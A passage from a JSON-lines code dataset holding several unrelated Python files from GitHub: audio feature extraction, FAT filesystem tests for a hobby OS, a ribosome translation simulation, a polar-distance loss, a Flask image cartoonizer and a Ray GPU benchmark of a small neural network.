\"emotions\", \"id\"])\n\n\ndef download_raw_data_sets():\n base_url = \"https://storage.googleapis.com/gresearch/goemotions/data/full_dataset/\"\n file_name = \"goemotions_%s\"\n\n file_urls = (f\"{base_url}{file_name % i}.csv\" for i in range(1, 4))\n file_paths = (local_paths.dir_datasets / f\"{file_name % i}.parquet\" for i in range(1, 4))\n\n for file_url, file_path in zip(file_urls, file_paths):\n download_csv_as_parquet(file_url, file_path, sep=\",\")\n\n\ndef start():\n download_raw_data_sets()\n download_merged_data_sets()\n","repo_name":"stdiff/emo-classifier","sub_path":"script/ingestion.py","file_name":"ingestion.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27166427940","text":"# -*- coding: utf-8 -*-\n\n\"\"\"VGGish feature extractor.\"\"\"\n\nimport os\nimport pickle\nimport numpy as np\nimport tensorflow.compat.v1 as tf # only tf.v1 in this function\nfrom functools import partial\nimport vggish_input # noqa: E402\nimport vggish_slim # noqa: E402\nimport vggish_params # noqa: E402\nimport vggish_postprocess # noqa: E402\n\nfrom src.features import FeatureExtractor\n\ntf.disable_v2_behavior()\n\n\nclass VGGishExtractor(FeatureExtractor):\n \"\"\"Class for feature extraction with VGGish.\n\n example:\n ex = VGGishExtractor()\n ex.pre_processing(input_paths, output_paths)\n \"\"\"\n\n def __init__(self, logfile=\"./log_vggish\"):\n \"\"\"Init method for VGGishExtractor.\"\"\"\n super().__init__(logfile=logfile)\n self.model_checkpoint = os.path.join(\"./data/vggish_model.ckpt\")\n self.pca_parameters = os.path.join(\"./data/vggish_pca_params.npz\")\n\n def pre_processing(self, input_paths, output_paths, num_workers=1):\n \"\"\"Run VGGish preprocessing.\"\"\"\n paths = list(zip(input_paths, output_paths))\n self.multi_process(self._pre_process, paths, num_workers)\n\n @staticmethod\n def _pre_process(paths):\n \"\"\"Individual VGGish preprocessing process.\"\"\"\n input_path, output_path = paths\n input_path_exists, output_path_exists = FeatureExtractor.feature_path_checker(\n input_path, output_path\n )\n\n if input_path_exists and not output_path_exists:\n features = vggish_input.wavfile_to_examples(\n input_path\n ) # can also do .ogg files\n pickle.dump(features, open(output_path, \"wb\"))\n del features\n\n def embedding(self, input_paths, output_paths):\n \"\"\"Run VGGish embedding.\"\"\"\n paths = list(zip(input_paths, output_paths))\n\n with tf.Graph().as_default(), tf.Session() as sess:\n vggish_slim.define_vggish_slim()\n vggish_slim.load_vggish_slim_checkpoint(sess, self.model_checkpoint)\n\n features_tensor = sess.graph.get_tensor_by_name(\n vggish_params.INPUT_TENSOR_NAME\n )\n embedding_tensor = sess.graph.get_tensor_by_name(\n vggish_params.OUTPUT_TENSOR_NAME\n )\n\n func = partial(\n self._embed,\n sess=sess,\n features_tensor=features_tensor,\n embedding_tensor=embedding_tensor,\n )\n\n self.single_process(func, paths)\n\n @staticmethod\n def _embed(paths, sess, features_tensor, embedding_tensor):\n \"\"\"Individual VGGish embedding process.\"\"\"\n input_path, output_path = paths\n input_path_exists, output_path_exists = FeatureExtractor.feature_path_checker(\n input_path, output_path\n )\n\n if input_path_exists and not output_path_exists:\n\n log_mel = pickle.load(open(input_path, \"rb\"))\n\n embedding = np.zeros((log_mel.shape[0], 128))\n\n size = len(log_mel)\n i = 0\n di = 100\n while i <= size:\n\n [embedding_batch] = sess.run(\n [embedding_tensor], feed_dict={features_tensor: log_mel[i : i + di]}\n )\n\n embedding[i : i + di] = embedding_batch\n i += di\n\n pickle.dump(embedding, open(output_path, \"wb\"))\n del embedding\n\n def post_processing(self, input_paths, output_paths, num_workers=1):\n \"\"\"Run VGGish postprocessing.\"\"\"\n paths = list(zip(input_paths, output_paths))\n post_processor = vggish_postprocess.Postprocessor(self.pca_parameters)\n func = partial(self._post_process, post_processor=post_processor)\n self.multi_process(func, paths, num_workers=num_workers)\n\n @staticmethod\n def _post_process(paths, post_processor):\n \"\"\"Individual VGGish postprocessing process.\"\"\"\n input_path, output_path = paths\n input_path_exists, output_path_exists = FeatureExtractor.feature_path_checker(\n input_path, output_path\n )\n\n if input_path_exists and not output_path_exists:\n embedding = pickle.load(open(input_path, \"rb\"))\n postprocessed = post_processor.postprocess(embedding)\n pickle.dump(postprocessed, open(output_path, \"wb\"))\n\n del postprocessed\n del embedding\n","repo_name":"trecpodcasts/podcast-audio-feature-extraction","sub_path":"src/features/VGGishExtractor.py","file_name":"VGGishExtractor.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"34053045656","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTesting FAT filesystem implementation\n\"\"\"\nimport collections\nimport re\nimport subprocess\n\nimport pytest\n\n\ndef make_empty_disk(fileobj, size):\n subprocess.check_call([\n 'dd', 'if=/dev/zero', 'of=' + str(fileobj), 'bs=1M',\n 'count={}'.format(size),\n ])\n\n\ndef add_file(tmpdir, diskfile, dest, contents):\n to_add = tmpdir.join('to_add')\n with to_add.open(mode='w') as f:\n f.write(contents)\n subprocess.check_call([\n 'mcopy', '-i', str(diskfile), str(to_add), dest,\n ])\n to_add.remove()\n\n\ndef add_dir(diskfile, name):\n subprocess.check_call(['mmd', '-i', str(diskfile), name])\n\n\ndef read_file(diskfile, name):\n return subprocess.check_output(['mtype', '-i', str(diskfile), name])\n\n\n@pytest.fixture\ndef f12disk(tmpdir):\n diskfile = tmpdir.join('disk')\n make_empty_disk(diskfile, 4)\n subprocess.check_call([\n 'mformat', '-i', str(diskfile),\n # 512-byte sector, 4 sectors per cluster. This matches what I've been\n # using from mkfs.vfat - it results in a FAT12 disk with 512-byte\n # sectors. Obviously, I'd like to be very general, but for now getting\n # functionality with one disk geometry and FS type is a good start.\n '-M', '512', '-c', '4',\n ])\n add_file(tmpdir, diskfile, '::/FILE1.TXT', 'the first file')\n add_file(tmpdir, diskfile, '::/EMPTY.TXT', 'a')\n add_dir(diskfile, '::/DIR')\n add_file(tmpdir, diskfile, '::/DIR/FILE2.TXT', 'the second file')\n yield diskfile\n\n\n@pytest.fixture\ndef fatvm(raw_vm, f12disk):\n raw_vm.start(diskimg=str(f12disk))\n raw_vm.read_until(raw_vm.prompt)\n raw_vm.cmd('exit')\n yield raw_vm\n\n\n@pytest.fixture\ndef devname(fatvm):\n match = re.search(r'blk: registered device \"(.*)\"', fatvm.full_output)\n assert match\n yield match.group(1)\n\n\ndef test_mount(fatvm, devname):\n output = fatvm.cmd(f'fat init {devname}')\n assert 'We determined fstype' in output\n\n\nFile = collections.namedtuple('File', ['type', 'name', 'size'])\n\n\ndef parse_ls(output):\n files = {}\n print(repr(output))\n output = output.strip()\n if output.endswith('\\r\\nksh>'):\n output = output[:-6].strip()\n print(repr(output))\n for line in output.split('\\r\\n')[1:]:\n line = line.strip()\n print(line)\n typ, name, size_parens = line.split(' ', maxsplit=2)\n # (len=X)\n print(size_parens)\n size = int(size_parens[5:-1])\n assert name not in files\n files[name] = File(typ, name, size)\n return files\n\n\ndef assert_has_file(files, name, typ=None, size=None):\n file_ = files.get(name)\n assert file_\n if typ is not None:\n assert file_.type == typ\n if size is not None:\n assert file_.size == size\n\n\n@pytest.fixture\ndef mountvm(fatvm, devname):\n fatvm.cmd(f'fat init {devname}')\n return fatvm\n\n\ndef test_list_root(mountvm):\n output = mountvm.cmd('fs ls /')\n files = parse_ls(output)\n assert len(files) == 3\n assert_has_file(files, 'FILE1.TXT', typ='f')\n assert_has_file(files, 'EMPTY.TXT', typ='f')\n assert_has_file(files, 'DIR', typ='d')\n\n\ndef test_list_other(mountvm):\n output = mountvm.cmd('fs ls /DIR')\n files = parse_ls(output)\n assert_has_file(files, '.', typ='d')\n assert_has_file(files, '..')\n assert_has_file(files, 'FILE2.TXT')\n\n\ndef test_cat_file_root(mountvm):\n output = mountvm.cmd('fs cat /FILE1.TXT')\n assert 'the first file' in output\n\n\ndef test_cat_file_other(mountvm):\n output = mountvm.cmd('fs cat /DIR/FILE2.TXT')\n assert 'the second file' in output\n\n\ndef test_multi_block_file(raw_vm, f12disk):\n # Need to do this test with a raw vm and manually mount, etc, because we\n # will need to \"reboot\".\n vm = raw_vm\n\n def boot(stop=True):\n if stop:\n vm.stop()\n vm.start(diskimg=str(f12disk))\n vm.read_until(vm.prompt)\n\n # Get disk name\n match = re.search(r'blk: registered device \"(.*)\"', vm.full_output)\n assert match\n devname = match.group(1)\n\n # Exit userspace and mount disk\n vm.cmd('exit')\n vm.cmd(f'fat init {devname}')\n\n boot(stop=False)\n\n # Add contents to the file\n string = '1234567890' * 12\n for _ in range(16):\n vm.cmd(f'fs addline /EMPTY.TXT {string}')\n\n # import os\n # os.system(f'cp {str(f12disk)} mydisk')\n # assert False\n\n # At this point, the file is 16 * 121 = 1936 bytes long. Writing one more\n # 121-byte chunk to the file will make it 2057 bytes long, which is just\n # longer than one cluster. The correct behavior is to allocate a new\n # cluster, update the FAT for both clusters, and write to the new cluster.\n # This test ensures that it happens both in-memory, and that the FAT\n # changes are properly written to disk so that on subsequent boots (and via\n # mtools) the file contents are properly stored.\n # TODO: the \"empty.txt\" file actually has a single character in it. It\n # turns out that an empty file need not have a block allocated for it (and\n # probably should not). As a result, a truly empty file would have a\n # cluster 0, which my code would take quite literally and have a tough time\n # on.\n vm.cmd(f'fs addline /EMPTY.TXT {string}')\n contents = vm.cmd('fs cat /EMPTY.TXT', rmprompt=True).replace('\\r\\n', '\\n')\n expected = 'a' + (string + '\\n') * 17\n assert contents == expected\n\n boot()\n contents = vm.cmd('fs cat /EMPTY.TXT', rmprompt=True).replace('\\r\\n', '\\n')\n assert contents == expected\n\n contents = read_file(f12disk, '::/EMPTY.TXT').decode('utf-8')\n assert contents == expected\n","repo_name":"brenns10/sos","sub_path":"integrationtests/test_fat.py","file_name":"test_fat.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"81"} +{"seq_id":"40254754748","text":"import json\nimport random\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef my_shuffle(arr):\n random.shuffle(arr)\n return arr\n\ndef run_simulation(dt, tsteps, kd_prot, kp_mRNA, kd_mRNA, alpha, beta, q_arr, codon_length, Np_0, Nr_0):\n\n Np_t = np.empty(tsteps, dtype=int)\n Np_t[0] = Np_0\n\n end_occ = np.zeros(tsteps) \n \n Np = Np_0\n Nr = Nr_0\n NmRNA = 0\n mRNAs = np.empty(0)\n for i in range(tsteps-1):\n\n # Simulate mRNA decay\n r_kd_mRNA = random.random()\n if r_kd_mRNA < kd_mRNA*NmRNA*dt:\n remove_idx = random.randint(0,NmRNA-1) # mRNA to remove\n Nr += np.sum(mRNAs[remove_idx,:]) # Add back ribosomes to free bulk\n mRNAs = np.delete(mRNAs, remove_idx, axis=0)\n NmRNA -= 1\n\n # Simulate mRNA production\n r_kp_mRNA = random.random()\n if r_kp_mRNA < kp_mRNA*dt:\n if NmRNA == 0:\n mRNAs = np.append(mRNAs, np.zeros(codon_length))\n mRNAs = np.reshape(mRNAs, (1,-1))\n else:\n mRNAs = np.vstack((mRNAs, np.zeros(codon_length)))\n NmRNA += 1\n \n # Simulate protein decay\n r_decay = random.random()\n if r_decay < dt*kd_prot*Np:\n Np -= 1\n \n # Simulate ribosome dynamics\n for idx in my_shuffle(np.arange(NmRNA)): # Randomize order in which to check mRNAs \n mRNAs[idx,:], Np, Nr = update_occupancy(mRNAs[idx,:], Np, Nr, dt, alpha, beta, q_arr, codon_length)\n\n if NmRNA > 0:\n end_occ[i+1] = np.mean(mRNAs[:,codon_length-1])\n Np_t[i+1] = Np\n\n return Np_t, end_occ\n\ndef update_occupancy(mRNA, Np, Nr, dt, alpha, beta, q_arr, codon_length):\n\n # Check initial occupancy at start and end before any movement\n start_occupied = mRNA[0]\n end_occupied = mRNA[codon_length-1]\n\n # Find indeces of occupied codons except end site and \n # shuffle list for simulation purposes\n occupied_idx = np.where(mRNA[0:codon_length-1] == 1)[0]\n random.shuffle(occupied_idx)\n\n # Simulate movement\n for i in occupied_idx:\n if mRNA[i+1] == 0:\n r_step = random.random()\n if r_step < q_arr[i]*dt:\n mRNA[i] = 0\n mRNA[i+1] = 1\n\n # Allow for attachment and detachment depending on initial occupancy\n if start_occupied == 0:\n r_attach = random.random()\n if r_attach < alpha*Nr*dt:\n mRNA[0] = 1\n Nr -= 1\n \n if end_occupied == 1:\n r_detach = random.random()\n if r_detach < beta*dt:\n mRNA[codon_length-1] = 0\n Np += 1\n Nr += 1\n \n return mRNA, Np, Nr\n\ndef get_codon_rates(codon_seq, rates_dict):\n codon_length = int(len(codon_seq)/3)\n\n q_arr = np.empty(codon_length)\n for i in range(codon_length):\n codon = codon_seq[3*i:3*(i+1)]\n q_arr[i] = rates_dict[codon]\n\n return q_arr\n\ndef get_seq_variant(codon_seq, cod_from_amin, amin_from_cod):\n\n var_seq = \"\"\n\n for i in range(0, len(codon_seq), 3):\n codon = codon_seq[i:i+3]\n amin = amin_from_cod[codon]\n possible_codons = cod_from_amin[amin]\n r = random.randint(0, len(possible_codons)-1)\n var_seq += possible_codons[r]\n \n return var_seq\n\n\n\nf = open(\"rates_from_codon.json\", \"r\")\nrate_from_codon = json.load(f)\nf.close()\n\nf = open(\"aminoacid_from_codon.json\", \"r\")\namin_from_cod = json.load(f)\nf.close()\n\nf = open(\"codons_from_aminoacid.json\", \"r\")\ncod_from_amin = json.load(f)\nf.close()\n\n\ncodon_seq = \"AGCGCGCGGUCACAACGUUACUGUUAUCGAUCCGGUCGAAAAACUGCUGGCAGUGGGGCAUUACCUCGAAUCUACCGUCGAUAUUGCUGA\"\n\ncodon_length = int(len(codon_seq)/3)\nn_variants = 100\n\nseq_vars = []\nq_vars = np.empty((n_variants+1, codon_length))\n\nseq_vars.append(codon_seq)\nq_vars[0,:] = get_codon_rates(codon_seq, rate_from_codon)\n\nfor i in range(1, n_variants+1):\n seq_vars.append(get_seq_variant(codon_seq, cod_from_amin, amin_from_cod))\n q_vars[i,:] = get_codon_rates(seq_vars[i], rate_from_codon)\n\n\nkd_prot = 1/1800\nkp_mRNA = 1/600\nkd_mRNA = 1/300\n\ndt = 0.02\ntsteps = 3600 * 3600\nNp_0 = 0\nNr_0 = 4*kp_mRNA/kd_mRNA\n\nbeta = 2\nalpha = 0.9\n\nNp_ts = np.empty((n_variants+1, tsteps))\nend_occs = np.empty((n_variants+1, tsteps))\n\nfor i, q_var in list(zip(range(n_variants+1), q_vars)):\n Np_ts[i,:], end_occs[i,:] = run_simulation(dt, tsteps, kd_prot, kp_mRNA, kd_mRNA, alpha, beta, q_var, codon_length, Np_0, Nr_0)\n\n\nnp.savetxt(\"data/q_vars.txt\", q_vars)\nnp.savetxt(\"data/Np_ts.txt\", Np_ts)\nnp.savetxt(\"data/end_occs.txt\", end_occs)\n\nf_params = open(\"data/params.txt\", \"w\")\nf_params.write(f\"alpha = {alpha}\\n\")\nf_params.write(f\"beta = {beta}\\n\")\nf_params.write(f\"dt = {dt}\\n\")\nf_params.write(f\"tsteps = {tsteps}\\n\")\nf_params.write(f\"variants = {n_variants}\\n\")\nf_params.close()\n\n","repo_name":"Snipersune/DynMod","sub_path":"Lab1/Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2362736781","text":"import torch\n\nclass PolarLoss(torch.nn.Module):\n def __init__(self, radius):\n super(PolarLoss, self).__init__()\n self.radius = radius\n\n def forward(self, X, Y):\n '''\n Computes the polar distance between the two points\n :param X:\n :param Y:\n :return:\n '''\n Rx = torch.sqrt(torch.sum(X.reshape(3, 2) * X.reshape(3, 2), dim=1))\n Ry = torch.sqrt(torch.sum(Y.reshape(3, 2) * Y.reshape(3, 2), dim=1))\n\n Tx = torch.atan2(X.reshape(3, 2)[:, 0], X.reshape(3, 2)[:, 1])\n Ty = torch.atan2(Y.reshape(3, 2)[:, 0], Y.reshape(3, 2)[:, 1])\n\n pointwise_loss = torch.sqrt(torch.pow(Ry - Rx, 2) + 2 * self.radius * torch.pow(Ty - Tx, 2))\n\n print(Rx, Ry)\n print(Tx, Ty)\n print(pointwise_loss)\n\n return torch.sum(pointwise_loss, dim=0)\n\n\nif __name__ == '__main__':\n criterion = PolarLoss(432.)\n X = torch.tensor([-385, -2, -385, -2, -385, -2], dtype=torch.float, requires_grad=True)\n Y = torch.tensor([0, 0, 0, 0, 0, 0], dtype=torch.float, requires_grad=True)\n loss = criterion(X, Y)\n print(loss)\n loss.backward()\n print(X, Y)\n\n","repo_name":"salmedina/BirdsEyeView","sub_path":"src/losses/PolarLoss.py","file_name":"PolarLoss.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9743846699","text":"import os\r\nfrom flask import Flask, redirect, url_for, request, render_template\r\nfrom catoonizer import *\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef upload():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n\r\n basepath = os.path.dirname(__file__)\r\n file_path = os.path.join(basepath, 'static', 'uploads',\r\n \"xx.\" + f.filename.split('.')[-1])\r\n\r\n f.save(file_path)\r\n out = cv2.imread(file_path)\r\n out = makecartoon(out)\r\n cv2.imwrite(\r\n os.path.join(basepath, 'static', 'uploads',\r\n \"xxx.\" + f.filename.split('.')[-1]), out)\r\n return redirect(url_for('static',\r\n filename='uploads/' + \"xxx.\" +\r\n f.filename.split('.')[-1]),\r\n code=301)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"yogendra-j/Cartoonizer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"75179281545","text":"import argparse\nimport time\nimport gc\nimport numpy as np\nimport ray\n\nfrom nums import numpy as nps\nfrom nums.core.array.application import ArrayApplication\nfrom nums.core.array.blockarray import BlockArray\nfrom nums.core.optimizer.cluster_sim import ClusterState\nfrom nums.core.optimizer.comp_graph import GraphArray\nfrom nums.core.optimizer.tree_search import RandomTS\nfrom nums.core.systems.filesystem import FileSystem\nfrom nums.core.systems.gpu_systems import (\n NumpySerialSystem,\n CupySerialSystem,\n NumpyRaySystem,\n CupyRaySystem,\n TorchCPURaySystem,\n TorchGPURaySystem,\n CupyOsActorSystem,\n CupyNcclActorSystem,\n CupyParallelSystem,\n)\nfrom nums.models.glms import LogisticRegression\nfrom nums.core import application_manager as am\nfrom utils import benchmark_func, get_number_of_gpus\nimport lr_opt as opt\n\nrandom_seed = 1337\n\n\ndef cupy_used_bytes():\n import cupy as cp\n\n mempool = cp.get_default_memory_pool()\n return mempool.used_bytes()\n\n\n# global app\n\ndef forward(app, X, W):\n Z = opt.collapse_graph_array(app, X @ W)\n return Z\n\n\ndef relu(app, X):\n return X * (X > app.zero)\n\n\ndef relu_deriv(app, X):\n return (X > app.zero) * app.one\n\n\ndef sigmoid(app, one, X):\n return one / (one + app.exp(-X))\n\n\ndef sigmoid_deriv(one, Z):\n return Z * (one - Z)\n\n\ndef one_step_fit_common(app, one, X, y, W_in_1, W_1_2, W_2_out):\n LR = one\n Z_1 = X @ W_in_1\n S_1 = sigmoid(app, one, Z_1)\n F_1 = sigmoid_deriv(one, Z_1).T\n\n Z_2 = S_1 @ W_1_2\n S_2 = sigmoid(app, one, Z_2)\n F_2 = sigmoid_deriv(one, Z_2).T\n\n Z_out = S_2 @ W_2_out\n F_out = sigmoid_deriv(one, Z_out).T\n y_predict = sigmoid(app, one, Z_out)\n\n # --back propagation--\n D_out = F_out * (y_predict - y).T\n D_2 = F_2 * (W_2_out @ D_out)\n D_1 = F_1 * (W_1_2 @ D_2)\n\n W_in_1 = W_in_1 - LR * (D_1 @ X).T\n W_1_2 = W_1_2 - LR * (D_2 @ S_1).T\n W_2_out = W_2_out - LR * (D_out @ S_2).T\n\n return W_in_1, W_1_2, W_2_out\n\n\ndef one_step_fit_np(np, X, y, W_in_1, W_1_2, W_2_out):\n rets = one_step_fit_common(np, 1, X, y, W_in_1, W_1_2, W_2_out)\n endtime = time.time()\n return endtime\n\n\ndef one_step_fit(app, X, y, W_in_1, W_1_2, W_2_out):\n rets = one_step_fit_common(app, app.one, X, y, W_in_1, W_1_2, W_2_out)\n endtime = time.time()\n\n for x in rets:\n x.touch()\n return endtime\n\n\ndef distribute_weights(W, cluster_state):\n for node_id in cluster_state.get_cluster_node_ids():\n for grid_entry in W.grid.get_entry_iterator():\n from nums.core.array.base import Block\n block: Block = W.blocks[grid_entry]\n if node_id not in cluster_state.get_block_node_ids(block.id):\n dst_actor = node_id[0]\n app.system.distribute_to(block.oid, dst_actor) # copy for compute\n cluster_state.commit_copy_block(block.id, node_id) # copy for optimizer\n\n\ndef one_step_fit_opt(app, X, y, W_in_1, W_1_2, W_2_out, num_gpus, verbose=False):\n # --forward propagation--\n if verbose:\n print(\"start forward propagation\")\n LR = app.one\n cluster_state = ClusterState((num_gpus, 1), app.system)\n one_ga: GraphArray = GraphArray.from_ba(app.one, cluster_state)\n X_ga = GraphArray.from_ba(X, cluster_state)\n y_ga = GraphArray.from_ba(y, cluster_state)\n W_in_1_ga = GraphArray.from_ba(W_in_1, cluster_state)\n W_1_2_ga = GraphArray.from_ba(W_1_2, cluster_state)\n W_2_out_ga = GraphArray.from_ba(W_2_out, cluster_state)\n\n if verbose:\n print(f\"distribute weights\")\n # Distribute Weights\n distribute_weights(W_in_1, cluster_state)\n distribute_weights(W_1_2, cluster_state)\n distribute_weights(W_2_out, cluster_state)\n\n Z_1_ga: GraphArray = forward(app, X_ga, W_in_1_ga)\n S_1_ga: GraphArray = opt.sigmoid(app, Z_1_ga, one_ga)\n F_1_ga: GraphArray = opt.sigmoid_deriv(app, Z_1_ga, one_ga)\n\n if verbose:\n print(\"forward Z_2\")\n Z_2_ga: GraphArray = forward(app, S_1_ga, W_1_2_ga)\n S_2_ga: GraphArray = opt.sigmoid(app, Z_2_ga, one_ga)\n F_2_ga: GraphArray = opt.sigmoid_deriv(app, Z_2_ga, one_ga)\n if verbose:\n print(\"forward Z_out\")\n Z_out_ga: GraphArray = forward(app, S_2_ga, W_2_out_ga)\n y_predict_ga: GraphArray = opt.sigmoid(app, Z_out_ga, one_ga)\n F_out_ga: GraphArray = opt.sigmoid_deriv(app, Z_out_ga, one_ga)\n\n initend = time.time()\n # --back propagation--\n D_out_ga = opt.collapse_graph_array(app, F_out_ga.T * (y_predict_ga - y_ga).T)\n if verbose:\n print(\"collapse D_2_ga\")\n D_2_ga = opt.collapse_graph_array(app, F_2_ga.T * (W_2_out_ga @ D_out_ga))\n if verbose:\n print(\"collapse D_1_ga\")\n D_1_ga = opt.collapse_graph_array(app, F_1_ga.T * (W_1_2_ga @ D_2_ga))\n\n endtime = time.time()\n if verbose:\n print(\"collapse_graph_array dW_in_1_ga\")\n \n dW_in_1_ga = opt.collapse_graph_array(app, (D_1_ga @ X_ga).T)\n if verbose:\n print(\"collapse_graph_array dW_1_2_ga\")\n dW_1_2_ga = opt.collapse_graph_array(app, (D_2_ga @ S_1_ga).T)\n if verbose:\n print(\"collapse_graph_array dW_2_out_ga\")\n dW_2_out_ga = opt.collapse_graph_array(app, (D_out_ga @ S_2_ga).T)\n\n dW_in_1_ga_ba: BlockArray = opt.compute_graph_array(app, dW_in_1_ga)\n dW_1_2_ga_ba: BlockArray = opt.compute_graph_array(app, dW_1_2_ga)\n dW_2_out_ga_ba: BlockArray = opt.compute_graph_array(app, dW_2_out_ga)\n\n W_in_1 = W_in_1 - LR * dW_in_1_ga_ba\n W_1_2 = W_1_2 - LR * dW_1_2_ga_ba\n W_2_out = W_2_out - LR * dW_2_out_ga_ba\n\n W_in_1.touch()\n W_1_2.touch()\n W_2_out.touch()\n\n return initend, endtime\n\n\ndef np_init_weights(app, X, y, dtype):\n dim_1 = 4096 # neurons in the first layer\n dim_2 = 4096 # neurons in the second layer\n\n W_in_1 = app.random.normal(size=(X.shape[1], dim_1)).astype(dtype)\n W_1_2 = app.random.normal(size=(dim_1, dim_2)).astype(dtype)\n W_2_out = app.random.normal(size=(dim_2, y.shape[1])).astype(dtype)\n return W_in_1, W_1_2, W_2_out\n\n\ndef data_init_weights(app: ArrayApplication, X, y, verbose=False):\n dim_1 = 4096 # neurons in the first layer\n dim_2 = 4096 # neurons in the second layer\n\n W_in_1 = app.random.normal(shape=(X.shape[1], dim_1), block_shape=(X.block_shape[1], dim_1), dtype=X.dtype)\n W_1_2 = app.random.normal(shape=(dim_1, dim_2), block_shape=(dim_1, dim_2), dtype=X.dtype)\n W_2_out = app.random.normal(shape=(dim_2, y.shape[1]), block_shape=(dim_2, y.block_shape[1]),\n dtype=X.dtype)\n if verbose:\n print(f\"W_in_1.shape {W_in_1.shape} W_in_1.block_shape {W_in_1.block_shape}\")\n print(f\"W_1_2.shape {W_1_2.shape} W_1_2.block_shape {W_1_2.block_shape}\")\n print(f\"W_2_out.shape {W_2_out.shape} W_2_out.block_shape {W_2_out.block_shape}\")\n return W_in_1, W_1_2, W_2_out\n\n\ndef np_sample(app, sample_size, feature, dtype):\n X_train = app.random.normal(size=(sample_size, feature)).astype(dtype)\n y_train = app.ones((sample_size, 1), dtype=dtype)\n return X_train, y_train\n\n\ndef sample(app: ArrayApplication, sample_size, feature, num_gpus, dtype):\n X_train = app.random.normal(shape=(sample_size, feature), block_shape=(sample_size // num_gpus, feature),\n dtype=dtype)\n y_train = app.ones(shape=(sample_size, 1), block_shape=(sample_size // num_gpus, 1), dtype=dtype)\n return X_train, y_train\n\n\ndef benchmark_mlp(num_gpus, N_list, system_class_list, d=1000, optimizer=True, dtype=np.float32):\n format_string = \"%20s,%10s,%10s,%10s,%10s,%10s\"\n print(format_string % (\"Library\", \"N\", \"Cost\", \"CostOpt\", \"CostInit\", \"CV\"))\n global app\n\n for N in N_list:\n N = int(N)\n\n for system_class in system_class_list:\n # try:\n if True:\n if system_class in [\"Cupy\", \"Numpy\"]:\n name = system_class\n import cupy as cp\n\n arr_lib = cp if system_class == \"Cupy\" else np\n app = arr_lib\n\n X, y = np_sample(np, sample_size=N, feature=d, dtype=dtype)\n W_in_1, W_1_2, W_2_out = np_init_weights(np, X, y, dtype=dtype)\n\n X = cp.asarray(X)\n y = cp.asarray(y)\n W_in_1 = cp.asarray(W_in_1)\n W_1_2 = cp.asarray(W_1_2)\n W_2_out = cp.asarray(W_2_out)\n\n cp.cuda.Device(0).synchronize()\n\n # Benchmark one step mlp\n def func():\n tic = time.time()\n toc_end = one_step_fit_np(arr_lib, X, y, W_in_1, W_1_2, W_2_out)\n cp.cuda.Device(0).synchronize()\n toc = time.time()\n return toc - tic, toc_end - tic, 0, None\n\n costs, costs_opt, costs_init = benchmark_func(func)\n del (X, y, W_in_1, W_1_2, W_2_out)\n else:\n # Init system\n name = system_class.__name__\n app = am.instance(num_gpus, optimizer)\n\n # Make dataset\n nps.random.seed(0)\n X, y = sample(app, sample_size=N, feature=d, num_gpus=num_gpus, dtype=dtype)\n W_in_1, W_1_2, W_2_out = data_init_weights(app, X, y, verbose=False)\n\n # Benchmark one step MLP\n def func():\n tic = time.time()\n if optimizer:\n toc_init, toc_opt = one_step_fit_opt(app, X, y, W_in_1, W_1_2, W_2_out, num_gpus, verbose=False)\n else:\n toc_init = tic\n toc_opt = one_step_fit(app, X, y, W_in_1, W_1_2, W_2_out)\n\n toc = time.time()\n return toc - tic, toc_opt - tic, toc_init - tic, None\n\n costs, costs_opt, costs_init = benchmark_func(func)\n\n del (X, y, W_in_1, W_1_2, W_2_out)\n am.destroy()\n # except Exception:\n else:\n costs = [-1]\n costs_opt = [-1]\n costs_init = [-1]\n\n log_str = format_string % (\n name,\n \"%d\" % N,\n \"%.4f\" % np.mean(costs),\n \"%.4f\" % np.mean(costs_opt),\n \"%.4f\" % np.mean(costs_init),\n \"%.2f\" % (np.std(costs) / np.mean(costs)),\n )\n\n print(log_str)\n with open(\"result_mlp_data.csv\", \"a\") as f:\n f.write(log_str + \"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--num-gpus\", type=int)\n parser.add_argument('--optimizer',\n help='This is a boolean flag.',\n type=eval,\n choices=[True, False],\n default='True')\n\n args = parser.parse_args()\n num_gpus = args.num_gpus or get_number_of_gpus()\n optimizer = args.optimizer\n\n ray.init(address='auto', _redis_password='5241590000000000')\n\n benchmark_mlp(\n num_gpus,\n N_list=[\n # 2000,\n # 4000,\n # 8000,\n 16000,\n 32000,\n 40000,\n 42000,\n 44000,\n # 0.5e6 / 4,\n # 1e6 / 4,\n # 2e6 / 4,\n # 3e6 / 4,\n # 5e6 / 4,\n # 10e6 / 4,\n # 20e6 / 4,\n # 40e6 / 4,\n # 80e6 / 4,\n # 160e6 / 4,\n # 200e6 / 4,\n ],\n system_class_list=[\n # NumpySerialSystem,\n # CupySerialSystem,\n # NumpyRaySystem,\n # CupyRaySystem,\n # TorchGPURaySystem,\n # CupyOsActorSystem,\n CupyNcclActorSystem,\n # CupyParallelSystem,\n # \"Cupy\",\n # \"Numpy\",\n ],\n optimizer=optimizer,\n )\n\n 